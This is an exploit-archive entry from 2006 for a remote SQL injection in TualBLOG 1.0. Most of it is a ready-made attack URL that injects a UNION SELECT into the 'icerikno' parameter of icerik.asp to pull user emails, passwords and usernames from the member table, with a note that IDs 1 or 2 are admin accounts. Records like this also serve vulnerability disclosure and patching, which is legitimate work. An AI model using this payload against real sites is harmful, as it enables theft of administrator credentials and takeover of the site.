id: 828
date: 09/12/2006
title: TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability
author: RMx
cves: 

==========================================================
TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability
==========================================================


# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp

exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1

uyeno = 1 or 2( Admin ID )



#  0day.today [2023-03-25]  #